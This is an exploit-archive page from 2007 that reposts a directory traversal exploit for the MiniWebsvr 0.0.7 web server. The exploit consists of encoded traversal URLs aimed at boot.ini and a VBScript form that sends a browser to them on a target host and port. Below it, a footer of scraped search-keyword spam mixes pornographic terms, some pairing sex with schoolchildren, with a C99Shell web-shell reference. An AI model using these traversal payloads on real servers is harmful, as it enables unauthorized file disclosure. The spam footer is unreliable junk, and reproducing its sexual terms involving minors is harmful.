about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MiniWebsvr 0.0.7 Remote Directory Transversal Exploit



2007-04-12 MiniWebsvr 0.0.7 Remote Directory Transversal Exploit
Rated as : Moderate Risk

<pre>
<code><span style="font: 10pt Courier New;"><span
class="general1-symbol">-------------------------------------------------------------
<b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b>
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
-------------------------------------------------------------

Host			Port
<input type=text name=txtIP value = "localhost">	<input
type=text name=txtPort value = "8080">

<input language=VBScript onclick=GetBoot() type=button
value="Click to get boot.ini">

<input language=VBScript onclick=BrowseMe() type=button
value="Click to browse">

<script language='vbscript'>
Sub GetBoot
  on error resume next
  document.location = "http://" + txtIP.value + ":" +
txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub

Sub BrowseMe
  on error resume next
  document.location = "http://" + txtIP.value + ":" +
txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
</script>
</span></span>
</code></pre>


securitydot.net - 2007-04-12

Advertising

Copyright 2007, SecurityDot
Wed, 09 Dec 2009 21:43:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www thrish CMS is Fre /search/ex free filte sparc sex gerls Tamil fuck Web Wiz Jo WWW.telugu research WWW.DOGFUC www samier Www shreya hhttp: /t myspace un Indo bugil Www securi nudygirls. news for c /data/vuln Www sexo.c Exploits S /search/ex Unreal Por www.hongta news for c !C99Shell anak sekol Mysql 4.4 sex tape ibs Www school Mysql 4.4 www.wmzjj. www.chinag 700.com-se sindhu4u.c www.thrisa www.jphmob http://www Www freepo videopono http://www Www.worldx Woman, Sex www.97xk.c 200 /compo Www .tamil punjabi se videopono